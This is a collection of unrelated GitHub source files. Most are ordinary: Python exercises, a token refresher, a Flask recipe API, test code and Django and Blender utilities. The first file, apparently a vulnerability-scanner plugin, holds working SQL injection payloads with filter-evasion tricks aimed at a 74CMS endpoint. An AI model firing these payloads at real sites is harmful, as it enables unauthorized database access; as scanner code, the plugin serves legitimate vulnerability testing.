+{"seq_id":"2087841274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Ascotbe'\n__date__ = '2019/10/11 16:39 PM'\nimport requests\nfrom ClassCongregation import VulnerabilityDetails,WriteFile,ErrorLog,ErrorHandling\n\n\nclass VulnerabilityInfo(object):\n def __init__(self,Medusa):\n self.info = {}\n self.info['number']=\"0\" # use 0 if there is no CVE or CNVD number; CVE numbers take priority over CNVD\n self.info['author'] = \"Ascotbe\" # plugin author\n self.info['create_date'] = \"2020-1-6\" # date the plugin was written\n self.info['disclosure']='2014-09-14'# vulnerability disclosure date; if unknown, use the date the plugin was written\n self.info['algroup'] = \"74CMSSQLInjectionVulnerabilityExists7\" # plugin name\n self.info['name'] ='74CMS存在SQL注入漏洞7' # vulnerability name\n self.info['affects'] = \"74CMS\" # affected component\n self.info['desc_content'] = \"骑士CMS/plus/ajax_common.php全局注入漏洞。\" # vulnerability description\n self.info['rank'] = \"高危\" # severity\n self.info['suggest'] = \"升级最新的系统\" # remediation advice\n self.info['version'] = \"20140709\" # versions affected by the vulnerability\n self.info['details'] = Medusa # result\n\ndef medusa(**kwargs)->None:\n url = kwargs.get(\"Url\")\n Headers=kwargs.get(\"Headers\")# get the passed-in headers\n proxies = kwargs.get(\"Proxies\")\n try:\n payload = \"/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,md5(1),3%23\"\n payload2=\"/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(1),3%23\"\n payload_url = url + payload\n payload_url2 = url + payload2\n\n resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)\n resp2 = requests.get(payload_url2, headers=Headers, timeout=6, proxies=proxies,verify=False)\n con = resp.text\n con2 = resp2.text\n code = resp.status_code\n code2 = resp2.status_code\n if (code==200 and con.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) or (code2==200 and con2.find('c4ca4238a0b923820dcc509a6f75849b') != -1 ) :\n Medusa = \"{}存在74CMS存在SQL注入漏洞\\r\\n漏洞地址:{}\\r\\n漏洞详情:{}\\r\\n\".format(url,payload_url,con)\n _t=VulnerabilityInfo(Medusa)\n VulnerabilityDetails(_t.info, resp2, **kwargs).Write() # pass in the URL and the scan results\n WriteFile().result(str(url), str(Medusa)) # write to file; url is the target filename, Medusa is the result\n except Exception as e:\n _ = VulnerabilityInfo('').info.get('algroup')\n ErrorHandling().Outlier(e, _)\n _l = ErrorLog().Write(\"Plugin Name:\"+_+\" || Target Url:\"+url,e)# call the log writer class","repo_name":"xuduofeng/Medusa","sub_path":"Modules/Cms/_74CMS/_74CMSSQLInjectionVulnerabilityExists7.py","file_name":"_74CMSSQLInjectionVulnerabilityExists7.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"}
+{"seq_id":"7453826284","text":"# Lesson 16\n\n# Create a program that generates five random numbers and puts them in a tuple.\n#\n# After that, show the list of generated numbers and also indicate the smallest and the largest value in the tuple.\n\nfrom random import randint\nnumeros = ()\nmaior = menor = 0\n\nfor item in range(0, 5):\n aleatorio = randint(1,10)\n numeros += (aleatorio,)\n\n if (item == 0):\n maior = menor = aleatorio\n else:\n if (aleatorio > maior):\n maior = aleatorio\n elif (aleatorio < menor):\n menor = aleatorio\n\nprint(f'''Os números aleatórios são: {numeros}\n{maior} é o maior e {menor} é o menor.''')","repo_name":"strawndri/curso_em_video_python","sub_path":"Mundo 03/Aula 16/ex074.py","file_name":"ex074.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"30382748759","text":"# Program that asks for two numbers\n# Declaration\nnum1,num2=0,0\nimport os\n\n# Input\nnum1=int(os.sys.argv[1])\nnum2=int(os.sys.argv[2])\n\nfor i in [num1 and num2]:\n# Show on screen if the first number is greater\n if(num1>num2):\n print(\"El primer numero\",num1,\" es mayor que \",num2)\n# if number 2 > number 1, indicate it on screen\n if(num2>num1):\n print(\"Numero \",num2,\" Es mayor que \",num1)\n# if the two numbers entered are equal, show it on screen\n if(num1==num2):\n print(\"Numero \",num1,\" Es igual que \",num2)\n #end_if\n#end_for\n","repo_name":"Kiaradamiancoloma/T07_DAMIAN-MENDOZA","sub_path":"MENDOZA GONZALES/iteracion5.py","file_name":"iteracion5.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"17500486707","text":"\nimport json\nfrom pixiv_auth import (\n AUTH_TOKEN_URL, CLIENT_ID,\n CLIENT_SECRET, USER_AGENT,\n REQUESTS_KWARGS,\n print_auth_token_response\n)\nimport requests\nfrom time import time\n\n\nclass refresher:\n \n def __init__(self):\n self.__token:str = None\n self.__load_token()\n pass\n \n # api\n def get_token(self) -> dict:\n return self.__token\n \n def do_refresh(self, refresh_token:str=None) -> dict:\n if refresh_token is None:\n refresh_token = self.__token['refresh_token']\n \n try:\n resp = self.__refresh(refresh_token)\n respjson = resp.json()\n # print(json.dumps(resp, indent=2, ensure_ascii=False))\n self.__token = {\n 'access_token': respjson['access_token'],\n 'refresh_token': respjson['refresh_token'],\n 'expires_in': respjson['expires_in'],\n 'refresh_at': self.__get_unixtimestamp(),\n }\n except KeyError:\n print('Failed to refresh pixiv token.')\n exit(-1)\n except Exception as err:\n print(f'do_refresh() Exception: {err}')\n \n print_auth_token_response(resp)\n self.__write_token()\n return self.__token\n \n # private helper functions\n def __load_token(self):\n try:\n with open('token.json', 'r', encoding='utf-8') as file:\n self.__token = json.load(file)\n except Exception as err:\n print(f'Failed to load tokens. Exception: {err}')\n exit(-1)\n \n def __write_token(self):\n try:\n with open('token.json', 'w', encoding='utf-8') as file:\n json.dump(self.__token, file, indent=2, ensure_ascii=False)\n except Exception as err:\n print(f'Failed to write to token.json. 
Exception: {err}')\n \n # copy from pixiv_auth.py with a bit modification\n def __refresh(self, refresh_token):\n response = requests.post(\n AUTH_TOKEN_URL,\n data={\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': 'refresh_token',\n 'include_policy': 'true',\n 'refresh_token': refresh_token,\n },\n headers={\n 'user-agent': USER_AGENT,\n 'app-os-version': '14.6',\n 'app-os': 'ios',\n },\n **REQUESTS_KWARGS\n )\n return response\n \n def __get_unixtimestamp(self):\n now = int(time())\n return now\n\n\n\nif __name__ == '__main__':\n try:\n ref = refresher()\n ref.do_refresh()\n except Exception as err:\n print(err)\n exit(-1)\n\n","repo_name":"Gavin1937/pixiv_token_refresher","sub_path":"refresher.py","file_name":"refresher.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30379660637","text":"from celery import task\nfrom django.core.mail import send_mail\nfrom .models import Order\n\n\n# @task\ndef order_created(order_id, payment_done):\n \"\"\"\n Task to send an e-mail notification when an order is\n successfully created.\n \"\"\"\n order = Order.objects.get(id=order_id)\n subject = f'Order nr. {order.id}'\n if(payment_done):\n message = f'Dear {order.first_name},\\n\\n' \\\n f'You have successfully placed an order at Choco-Stop. ' \\\n f'Your order ID is {order.id}. ' \\\n f'Payment done successfully.'\n else:\n message = f'Dear {order.first_name},\\n\\n' \\\n f'You have successfully placed an order at Choco-Stop. ' \\\n f'Your order ID is {order.id}. ' \\\n f'Please pay by cash on delivery.'\n mail_sent = send_mail(subject,\n message,\n 'chocolateshop111@gmail.com',\n [order.email])\n # print(subject,message,order.email)\n return mail_sent\n","repo_name":"SuryaGitDev/ChocolateShop","sub_path":"orders/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17951118114","text":"import bpy\nimport os\n\nD = bpy.data\n\n\"\"\"\n This little script quicly update images path.\n In this example we tell Blender to use the A: drive instead of network path.\n\"\"\"\n\nwrongPath = r\"\\\\my-wrong-path\"\ncorrectPath = r\"//textures\"\n\nprint(\"+++ path correction +++\")\n\nfor img in D.images:\n img.filepath = img.filepath.replace(wrongPath, correctPath)\n\n# check in the console what's rest to fix\nfor img in D.images:\n if not img.filepath.startswith(correctPath): \n print(\"wrong path: {} {}\".format(img.name, img.filepath))","repo_name":"Vinc3r/Blender-Python-Snippets","sub_path":"blender-2.7-/textures/texture-quick-replace-path.py","file_name":"texture-quick-replace-path.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"34912732880","text":"from flask import Flask, jsonify,request\nimport requests\nimport pandas as pd\nimport json\nfrom pandas import json_normalize\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport time\nimport sqlite3\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return \"Tutor Joes 
Api\"\n\n\n\n#https://nokin-taro.com/rakuten-recipe-api/\n#https://qiita.com/konitech913/items/7ffa7907a6c03c8909fc\n#https://virtualsanpo.blogspot.com/2020/06/pythonfirebase-cloud-firestorejson.html\n\n#urlの作成\nbase_url = 'https://app.rakuten.co.jp/services/api/Recipe/CategoryList/20170426?' #レシピランキングAPIのベースとなるURL\n\nitem_parameters = {\n 'applicationId': '1057310997502838737', #アプリID\n 'format': 'json',\n 'formatVersion': 2,\n}\n\nr = requests.get(base_url, params=item_parameters)\njson_data = r.json()\n#print(json_data)\n\n# mediumカテゴリの親カテゴリの辞書\nparent_dict = {}\n\ndf = pd.DataFrame(columns=['category1','category2','category3','categoryId','categoryName'])\n\n# 大カテゴリ\nfor category in json_data['result']['large']:\n df = df.append({'category1':category['categoryId'],'category2':\"\",'category3':\"\",'categoryId':category['categoryId'],'categoryName':category['categoryName']}, ignore_index=True)\n\n\n# 中カテゴリ\nfor category in json_data['result']['medium']:\n df = df.append({'category1':category['parentCategoryId'],'category2':category['categoryId'],'category3':\"\",'categoryId':str(category['parentCategoryId'])+\"-\"+str(category['categoryId']),'categoryName':category['categoryName']}, ignore_index=True)\n parent_dict[str(category['categoryId'])] = category['parentCategoryId']\n\n\n# 小カテゴリ\nfor category in json_data['result']['small']:\n df = df.append({'category1':parent_dict[category['parentCategoryId']],'category2':category['parentCategoryId'],'category3':category['categoryId'],'categoryId':parent_dict[category['parentCategoryId']]+\"-\"+str(category['parentCategoryId'])+\"-\"+str(category['categoryId']),'categoryName':category['categoryName']}, ignore_index=True)\n\n\n\n#https://rayt-log.com/%E3%80%90firebase%E3%80%91python%E3%81%A7cloud-firestore%E3%81%AB%E5%80%A4%E3%82%92%E8%BF%BD%E5%8A%A0%E3%83%BB%E5%8F%96%E5%BE%97%E3%81%99%E3%82%8B%E6%96%B9%E6%B3%95%EF%BC%81/\n#Firebaseのrefriを取得\n\n\ncred = credentials.Certificate(\"C:/firebase_myref/myref1-3-firebase-adminsdk-8eoqo-f254d2b63e.json\")\nfirebase_admin.initialize_app(cred)\ndb = firestore.client()\n\ndbname = \"C:/Users/ueda5/AppData/Local/Google/AndroidStudio2021.3/device-explorer/Pixel_5_API_30 [emulator-5554]/data/data/com.example.app_grid13/databases/assets/myref3.db\"\nconn = sqlite3.connect(dbname)\ndocs = conn.cursor() \n\n\nrefri = db.collection('refri')\ndocs = refri.stream()\n\n\n#データフレームを複数作成する\ndf_recipe2 = pd.DataFrame(columns=['foodImageUrl', 'recipeUrl'])\n\ndf_recipe3 = pd.DataFrame(columns=['image', 'url'])\n\n#recipe_test1.json\nfor doc in docs:\n doc=doc.to_dict()\n doc=doc['name']\n #print(doc)\n #docから'name'だけを引っ張りたい\n df_keyword = df.query('categoryName.str.contains(@doc)', engine='python')\n df_keyword2 = df_keyword['categoryName']\n df_keyword2.to_json('recipe_test1.json')\n\n json_open = open('recipe_test1.json', 'r')\n json_load = json.load(json_open)\n\n\n for index, row in df_keyword.iterrows():\n time.sleep(3)\n url = 'https://app.rakuten.co.jp/services/api/Recipe/CategoryRanking/20170426?applicationId=1057310997502838737&categoryId='+row['categoryId']\n res = requests.get(url)\n #firebase_recipe_ranking\n json_data = json.loads(res.text)\n recipes = json_data['result']\n\n #df_recipe2\n for recipe in recipes:\n df_recipe2 = df_recipe2.append({'foodImageUrl':recipe['foodImageUrl'], 'recipeUrl':recipe['recipeUrl']}, ignore_index=True)\n #print(type(df_recipe))\n df_recipe2.to_json('recipe_test2.json')\n\n json_open2 = open('recipe_test2.json', 'r')\n json_load2 = json.load(json_open2)\n\n'''\nfor 
recipe_image in json_load2['foodImageUrl'].values():\n image2=recipe_image\n\nfor recipeURL in json_load2['recipeUrl'].values():\n url2=recipe_image\n'''\n#2つをまとめてjsonに格納する\n\nfor recipe_image,recipeURL in zip(json_load2['foodImageUrl'].values(),json_load2['recipeUrl'].values()):\n #doc_ref = db.collection(u'recipe').document()\n #doc_ref.set({u'image':recipe2,u'URL':recipeURL})\n df_recipe3= df_recipe3.append({'image':recipe_image,'url':recipeURL}, ignore_index=True)\n #print(type(df_recipe2))\n\n \n df_recipe3.to_json('recipe_test3.json')\n json_open = open('recipe_test3.json', 'r')\n json_load3 = json.load(json_open)\n \n \nbasedir=os.path.abspath(os.path.dirname(__file__))\n#print(basedir)\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///'+os.path.join(basedir,'recipe_db.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n# User Table Model \nclass Recipe(db.Model):\n id=db.Column(db.Integer, primary_key=True)\n image = db.Column(db.String(100))\n url = db.Column(db.String(100), unique=True)\n \n def __init__(self,image,url) :\n self.image=image\n self.url=url\n \nclass RecipeSchema(ma.Schema):\n class Meta:\n fields = ('id', 'image', 'url')\n\nrecipe_schema = RecipeSchema()\nrecipe_schema=RecipeSchema(many=True)\n\n#https://stackoverflow-com.translate.goog/questions/44941757/sqlalchemy-exc-operationalerror-sqlite3-operationalerror-no-such-table?_x_tr_sl=en&_x_tr_tl=ja&_x_tr_hl=ja&_x_tr_pto=sc\n@app.before_first_request\ndef create_tables():\n db.create_all()\n\n# Show\n@app.route('/recipe',methods=['GET'])\ndef getAllUser():\n \n #all_recipes=Recipe.query.all()\n #result=recipe_schema.dump(all_recipes)\n return jsonify(json_load3)\n \n@app.route('/recipe/',methods=['GET'])\ndef getUserByid(id):\n recipe=Recipe.query.get(id)\n return recipe_schema.jsonify(recipe)\n \n \nif __name__ == '__main__':\n app.run(debug=True,port=5000)\n\n'''\n@app.route('/recipe',methods=['POST'])\ndef add_user():\n #image=request.json[df_recipe2['image']]\n #url=request.json[df_recipe2['url']]\n \n print(image2)\n \n new_recipe=Recipe(image2,url2)\n db.session.add(new_recipe)\n db.session.commit()\n \n #json_load['Query'] = str(request.args['Query'])\n return recipe_schema.jsonify(df_recipe2)\n'''","repo_name":"uedazxcvbnm/myref_flask1","sub_path":"lib/flask_recipe.py","file_name":"flask_recipe.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25598150584","text":"T = int(input())\nfor test_case in range(1, T + 1):\n num = int(input())\n calc = 0\n\n for i in range(num + 1):\n if i % 2 == 1:\n calc += i\n elif i % 2 == 0:\n calc -= i\n print('#{0} {1}'.format(test_case, calc))","repo_name":"nekopurr/SW_Expert_Academy","sub_path":"Level2/1986_지그재그숫자.py","file_name":"1986_지그재그숫자.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32748197658","text":"class Solution(object):\n def rotate(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n l=len(nums)-1\n p=l\n save=0\n while k>len(nums):\n k-=len(nums)\n for j in range(k):\n save=nums[l]\n for i in range(len(nums)):\n p -=1\n if p==(-1):\n nums[0]=save\n else:\n nums[l]=nums[p]\n l -=1\n l=len(nums)-1\n p=l","repo_name":"PEIPEISHEEP/LeetCode-189-Rotate-Array","sub_path":"Rotate 
Array超時版.py","file_name":"Rotate Array超時版.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"27355441502","text":"from unittest.mock import MagicMock, patch\n\nfrom birdfeeder.timed_aggregator import TimedAggregator, TimedMetricItem, average, summation\n\n\ndef test_create_with_value():\n    with patch('time.time', return_value=42):\n        item = TimedMetricItem.create_with_value(100)\n    assert item.timestamp == 42\n    assert item.value == 100\n\n\ndef test_summation():\n    values = [2, 4, 5]\n    sum_ = summation(TimedMetricItem.create_with_value(i) for i in values)\n    assert sum_ == sum(values)\n\n\ndef test_average():\n    values = [3, 4, 5]\n    avg = average(TimedMetricItem.create_with_value(i) for i in values)\n    assert avg == 4\n\n\ndef test_timed_aggregator():\n    window = 10\n    start = 0\n    time = MagicMock(return_value=start)\n    aggregator = TimedAggregator(window, aggregation_func=summation, time_func=time)\n\n    aggregator.add(value=42)\n    time.return_value = start + window + 1\n    assert aggregator.aggregated_value == 0\n\n\ndef test_timed_aggregator_average():\n    window = 10\n    start = 0\n    time = MagicMock(return_value=start)\n    aggregator = TimedAggregator(window, aggregation_func=summation, time_func=time)\n\n    aggregator.add(value=5)\n    time.return_value = start + 1\n    aggregator.add(value=7)\n    time.return_value = start + 2\n    aggregator.add(value=6)\n    time.return_value = start + 3\n    aggregator.add(value=2)\n\n    assert aggregator.average_value == 5\n","repo_name":"CoinAlpha/birdfeeder","sub_path":"tests/test_timed_aggregator.py","file_name":"test_timed_aggregator.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"5467134948","text":"import os\nimport time\nfrom io import StringIO\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport pandas as pd\nimport requests\nfrom tldextract import tldextract\nimport sys\n\n\ndef get_domains() -> Tuple[pd.DataFrame, pd.DataFrame]:\n    response = requests.get(\"https://tranco-list.eu/download/L294/200000\")\n    df = pd.read_csv(StringIO(response.text), header=None, index_col=0, names=['domain'])\n    df['tld'] = df['domain'].apply(lambda d: tldextract.extract(d).suffix)\n    df['nl'] = df['tld'] == 'nl'\n    return df[df['nl'] == True], df[df['nl'] == False]\n\n\ndef get_and_write_domains(target_dir: str, dutch_limit: int = 50, world_limit: int = 500) -> None:\n    target_dir = Path(target_dir) \\\n        # / time.strftime(\"%Y%m%d-%H%M%S\")\n    target_dir.mkdir(parents=True, exist_ok=True)\n    dutch_df, world_df = get_domains()\n    write_domain_df_to_csv(dutch_df[:dutch_limit], target_dir / f'dutch_top_{dutch_limit}.csv')\n    write_domain_df_to_csv(world_df[:world_limit], target_dir / f'world_top_{world_limit}.csv')\n    write_domain_df_to_csv(pd.concat([world_df[:world_limit], dutch_df[:dutch_limit]], ignore_index=True), target_dir / f'combined_{world_limit + dutch_limit}.csv')\n\n\ndef write_domain_df_to_csv(df_: pd.DataFrame, file: Path) -> None:\n    df = df_.copy()\n    df = df.reset_index()\n    df.index += 1\n    df.domain.to_csv(file, index=True, header=False)\n\n\nif __name__ == '__main__':\n    dutch_limit = int(sys.argv[1])\n    world_limit = int(sys.argv[2])\n    print(f\"Getting top {dutch_limit} .nl domains & top {world_limit} world domains\")\n    get_and_write_domains('../resources/input', dutch_limit=dutch_limit, 
world_limit=world_limit)\n","repo_name":"ptemarvelde/gdpr_cookies","sub_path":"util/top_domains.py","file_name":"top_domains.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"22402799110","text":"from app.models.base import BaseTable\n\nclass OrangeData(BaseTable):\n\n def __init__(self):\n self.__database__ = 'mpmds'\n self.__tablename__ = 'MPMDS_ORANGE_DATA'\n super().__init__()\n\n\n def list_pic(self, companyid, divisionid):\n result = []\n message = \"\"\n try:\n data, message = super().list()\n for x in data:\n # if companyid == x[0] and divisionid == x[6]:\n if divisionid == x[6]:\n row = {\n 'companyid': x[0],\n 'employeeid': x[1],\n 'displayname': f'''{str(x[1]).zfill(5)} - {x[2]}''',\n 'gradeid': x[3],\n 'internaltitle': x[4],\n 'companyoffice': x[5],\n 'divisionid': x[6],\n 'divisionname': x[7],\n 'departmentid': x[8],\n 'departmentname': x[9],\n }\n result.append(row)\n except Exception as e:\n print(str(e))\n result = None\n message = str(e)\n\n return (result, message)\n \n\n # def list_pic(self, companyid, divisionid):\n # result = []\n # message = \"\"\n # try:\n # query = \"select a.* from %s a \" \\\n # \"left join mpmit_pic b on RIGHT('00000'+CAST(ISNULL(a.CODE ,0) AS VARCHAR(5)),5) = b.NPK \" \\\n # \"where b.email is not null\" % (self.__tablename__)\n # data, message = self.execute(query, ())\n # for x in data:\n # # if companyid == x[0] and divisionid == x[6]:\n # if divisionid == x[6]:\n # row = {\n # 'companyid': x[0],\n # 'employeeid': x[1],\n # 'displayname': x[2],\n # 'gradeid': x[3],\n # 'internaltitle': x[4],\n # 'companyoffice': x[5],\n # 'divisionid': x[6],\n # 'divisionname': x[7],\n # 'departmentid': x[8],\n # 'departmentname': x[9],\n # }\n # result.append(row)\n # except Exception as e:\n # print(str(e))\n # result = None\n # message = str(e)\n\n # return (result, message)","repo_name":"wayhdyh98/Digital-Approval","sub_path":"app/models/orange.py","file_name":"orange.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41802931246","text":"import os\nimport numpy as np\n# load pickle from dsm, ort_bw and ort_color directories\n#create img directory if not exists\nos.makedirs('img', exist_ok=True)\nfiles = [\"20181121_AMO_020.npy\",\"20201219_GRO_037.npy\",\"20201219_RYB_020.npy\",\"20210713_GRO_030.npy\",\"20210713_RYB_006.npy\"]\nfor file in files:\n dsm = np.load(f\"dsm/{file}\")\n ort_color = np.load(f\"ort_color/{file}\")\n ort_bw = np.load(f\"ort_bw/{file}\")\n print(file)\n name = file.split(sep=\"_\")[1]+file[2:4]\n #plot the dsm, ort_bw and ort_color on the same plot\n import matplotlib.pyplot as plt\n import matplotlib as mpl\n plt.imshow(dsm, cmap='viridis')\n plt.axis('off')\n plt.savefig(f'img/dsm_{name}.png', transparent=True, bbox_inches='tight', pad_inches=0)\n \n \n plt.imshow(ort_bw, cmap='gray')\n plt.axis('off')\n plt.savefig(f'img/ortbw_{name}.png', transparent=True, bbox_inches='tight', pad_inches=0)\n ort_color = np.moveaxis(ort_color, 0, -1)\n plt.imshow(ort_color)\n plt.axis('off')\n plt.savefig(f'img/ortcolor_{name}.png', transparent=True, bbox_inches='tight', 
pad_inches=0)\n\n\n","repo_name":"radekszostak/river-wse-uav-ml","sub_path":"tools/dataset/generate_vis.py","file_name":"generate_vis.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28433991797","text":"# -*- coding: utf-8 -*-\n\n# python\nimport csv\nimport os\n\n# django\nfrom django.test import TestCase\n\n# leukapp\nfrom leukapp.apps.leukforms.factories import LeukformSamplesFactory\nfrom leukapp.apps.aliquots.factories import AliquotFactory\n\n# local\nfrom ..constants import CREATE_FIELDS, MODELS_LIST\n\n\nclass LeukformCsvFactoryTest(TestCase):\n\n def test_set_parameters_individual(self):\n batch = LeukformSamplesFactory()\n parent = None\n batch.request['Specimen'] = 0\n kwargs, child = batch._update_parameters(\n model='Individual', parent=parent)\n self.assertDictEqual(kwargs, {})\n self.assertEqual(child, 'Specimen')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_specimen(self):\n batch = LeukformSamplesFactory()\n parent = 'individualInstance'\n batch.request['Aliquot'] = 0\n kwargs, child = batch._update_parameters(\n model='Specimen', parent=parent, order=1)\n self.assertDictEqual(kwargs, {'individual': parent, 'order': '1'})\n self.assertEqual(child, 'Aliquot')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_aliquot(self):\n batch = LeukformSamplesFactory()\n parent = 'specimenInstance'\n batch.request['Extraction'] = 0\n kwargs, child = batch._update_parameters(\n model='Aliquot', parent=parent)\n self.assertDictEqual(kwargs, {'specimen': parent})\n self.assertEqual(child, 'Extraction')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_extraction(self):\n batch = LeukformSamplesFactory()\n parent = 'aliquotInstance'\n batch.request['Workflow'] = 0\n kwargs, child = batch._update_parameters(\n model='Extraction', parent=parent)\n self.assertDictEqual(kwargs, {'aliquot': parent})\n self.assertEqual(child, 'Workflow')\n self.assertEqual(batch._last, True)\n\n def test_set_parameters_workflow(self):\n batch = LeukformSamplesFactory()\n parent = 'extractionInstance'\n kwargs, child = batch._update_parameters(\n model='Workflow', parent=parent)\n self.assertEqual(kwargs['extraction'], parent)\n self.assertEqual(batch._last, True)\n self.assertEqual(child, None)\n batch_projects = [p.pk for p in batch.projects]\n projects_string = kwargs['projects_string'].split('|')\n projects_string = [int(e) for e in projects_string]\n [self.assertIn(p, batch_projects) for p in projects_string]\n\n def test_write_row_delete_false_last_false_slug_true(self):\n batch = LeukformSamplesFactory()\n batch._last = False\n batch._delete = False\n batch._slug = True\n instance = AliquotFactory()\n batch._write_row(instance, model='Aliquot')\n self.assertDictEqual(batch._row, {'Aliquot.slug': instance.slug})\n\n def test_write_row_delete_false_last_false_slug_false(self):\n batch = LeukformSamplesFactory()\n batch._last = False\n batch._delete = False\n batch._slug = False\n instance = AliquotFactory()\n batch._write_row(instance, model='Aliquot')\n self.assertEqual(batch._row['Aliquot.ext_id'], instance.ext_id)\n\n def test_write_row_delete_true_last_false(self):\n batch = LeukformSamplesFactory()\n batch._last = False\n batch._delete = True\n batch._slug = False\n instance = AliquotFactory()\n row = {}\n notused = [\"individual\", \"specimen\", \"aliquot\", \"extraction\"]\n for field in CREATE_FIELDS['Aliquot']:\n if field in notused:\n 
continue\n column = \"{0}.{1}\".format('Aliquot', field)\n value = eval('instance.{0}'.format(field))\n row[column] = str(value)\n batch._write_row(instance, model='Aliquot')\n self.assertDictEqual(batch._row, row)\n\n def test_write_row_delete_true_last_true(self):\n batch = LeukformSamplesFactory()\n batch._last = True\n batch._delete = True\n batch._slug = False\n instance = AliquotFactory()\n row = {}\n rows = []\n notused = [\"individual\", \"specimen\", \"aliquot\", \"extraction\"]\n for field in CREATE_FIELDS['Aliquot']:\n if field in notused:\n continue\n column = \"{0}.{1}\".format('Aliquot', field)\n value = eval('instance.{0}'.format(field))\n row[column] = str(value)\n rows.append(row.copy())\n batch._write_row(instance, model='Aliquot')\n self.assertDictEqual(batch._row, row)\n self.assertCountEqual(batch.rows, rows)\n with self.assertRaises(AssertionError):\n instance.delete()\n\n def test_create_batch_create_instances(self):\n batch = LeukformSamplesFactory()\n\n # prefunction\n for model in MODELS_LIST:\n self.assertEqual(len(batch.instances[model]), 0)\n\n batch.create_batch()\n\n # check that the required number of instances were created\n for model in MODELS_LIST:\n self.assertEqual(len(batch.instances[model]), 1)\n\n # test extractions projects lists are being assigned correctly\n batch_projects = [p.pk for p in batch.projects]\n projects_string = \\\n batch.rows[0]['Workflow.projects_string'].split(\"|\")\n projects_string = [int(e) for e in projects_string]\n [self.assertIn(p, batch_projects) for p in projects_string]\n\n def test_csv_from_rows(self):\n self.maxDiff = None\n batch = LeukformSamplesFactory()\n batch.create_batch()\n path = batch.create_csv_from_rows()\n\n with open(path, 'r') as testcsv:\n rows = csv.DictReader(testcsv, delimiter=\",\")\n rows = list(rows)\n\n self.assertCountEqual(batch.rows, rows)\n os.remove(path)\n","repo_name":"komalsrathi/leukapp","sub_path":"leukapp/apps/leukforms/tests/test_factories.py","file_name":"test_factories.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12813500741","text":"from app.main import get_people\n\n\ndef test_get_people():\n response = get_people(\"R5-D4\")\n people = response[0].get(\"item\")\n assert people[\"name\"] == \"R5-D4\"\n\n\ndef test_get_recommendations_for_people():\n \"\"\"\n Characters in the same film\n \"\"\"\n response = get_people(\"luke\")\n\n recommendations = response[0].get(\"recommendations\")\n assert recommendations[0][\"name\"] == \"C-3PO\"\n assert recommendations[1][\"name\"] == \"R2-D2\"\n assert recommendations[2][\"name\"] == \"Darth Vader\"\n","repo_name":"alynnefs/star-wars-back","sub_path":"tests/tests_people.py","file_name":"tests_people.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"861564250","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom datadog_api_client.model_utils import (\n ModelNormal,\n cached_property,\n)\n\n\nif TYPE_CHECKING:\n from datadog_api_client.v2.model.fastly_account_update_request_data import FastlyAccountUpdateRequestData\n\n\nclass FastlyAccountUpdateRequest(ModelNormal):\n @cached_property\n def openapi_types(_):\n from datadog_api_client.v2.model.fastly_account_update_request_data import FastlyAccountUpdateRequestData\n\n return {\n \"data\": (FastlyAccountUpdateRequestData,),\n }\n\n attribute_map 
